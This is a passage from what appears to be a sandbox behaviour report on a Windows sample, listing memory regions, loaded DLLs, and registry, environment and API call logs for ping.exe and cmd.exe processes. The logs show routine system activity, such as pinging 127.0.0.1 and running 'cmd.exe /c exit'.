pagefile_0x0000000000190000	0x00190000	0x00196fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000001b0000	0x001b0000	0x001effff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000001f0000	0x001f0000	0x002f0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000300000	0x00300000	0x003fffff	Private Memory	Readable, Writable	Region Actions Download Dump
ping.exe.mui	0x00400000	0x00402fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000410000	0x00410000	0x00410fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000420000	0x00420000	0x00420fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000490000	0x00490000	0x004cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000005b0000	0x005b0000	0x005bffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x005c0000	0x0088efff	Memory Mapped File	Readable	Region Actions
private_0x00000000008e0000	0x008e0000	0x0091ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000950000	0x00950000	0x0098ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000990000	0x00990000	0x00aaffff	Private Memory	Readable, Writable	Region Actions Download Dump
ping.exe	0x00f30000	0x00f37fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000f40000	0x00f40000	0x01b3ffff	Pagefile Backed Memory	Readable	Region Actions
wshqos.dll	0x71f20000	0x71f25fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x740e0000	0x740e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x740f0000	0x7410bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wshtcpip.dll	0x749d0000	0x749d4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mswsock.dll	0x74e30000	0x74e6bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wship6.dll	0x75270000	0x75275fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x756f0000	0x75708fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75710000	0x757b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x764f0000	0x7658ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x76960000	0x76994fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x773e0000	0x773e5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xcec

(Host: 17, Network: 1)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-10-11 11:01:38 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 84412	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ping.exe, base_address = 0xf30000	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, value_name = DefaultTTL, data = 0, type = REG_NONE	1	Fn
DNS	Resolve Name	host = 127.0.0.1, address_out = 127.0.0.1, service = 0	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 20	1	Fn Data
File	Write	filename = STD_OUTPUT_HANDLE, size = 24	1	Fn Data
File	Write	filename = STD_OUTPUT_HANDLE, size = 22	1	Fn Data
File	Write	filename = STD_OUTPUT_HANDLE, size = 9	3	Fn Data
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 22	1	Fn Data
File	Write	filename = STD_OUTPUT_HANDLE, size = 9	3	Fn Data
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 22	1	Fn Data
File	Write	filename = STD_OUTPUT_HANDLE, size = 9	3	Fn Data
File	Write	filename = STD_OUTPUT_HANDLE, size = 92	1	Fn Data
File	Write	filename = STD_OUTPUT_HANDLE, size = 97	1	Fn Data

Process #26: cmd.exe

(Host: 42, Network: 0)

Information	Value
ID	#26
File Name	c:\windows\system32\cmd.exe
Command Line	cmd.exe /c exit
Initial Working Directory	C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor	Start Time: 00:00:53, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:22

OS Process Information

Information	Value
PID	0xd04
Parent PID	0xcc4 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x D08

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000000f0000	0x000f0000	0x001effff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000240000	0x00240000	0x0024ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000250000	0x00250000	0x00317fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000370000	0x00370000	0x0046ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000580000	0x00580000	0x0117ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001180000	0x01180000	0x012e2fff	Pagefile Backed Memory	Readable	Region Actions
cmd.exe	0x49e50000	0x49e9bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winbrand.dll	0x721b0000	0x721b6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xd08

(Host: 38, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-10-11 11:01:40 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 86549	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49e50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x765e24c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String		2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\BGC6u8Oy yXGxkR\Desktop	1	Fn
Environment	Get Environment String		1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x765cac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x765e2732	1	Fn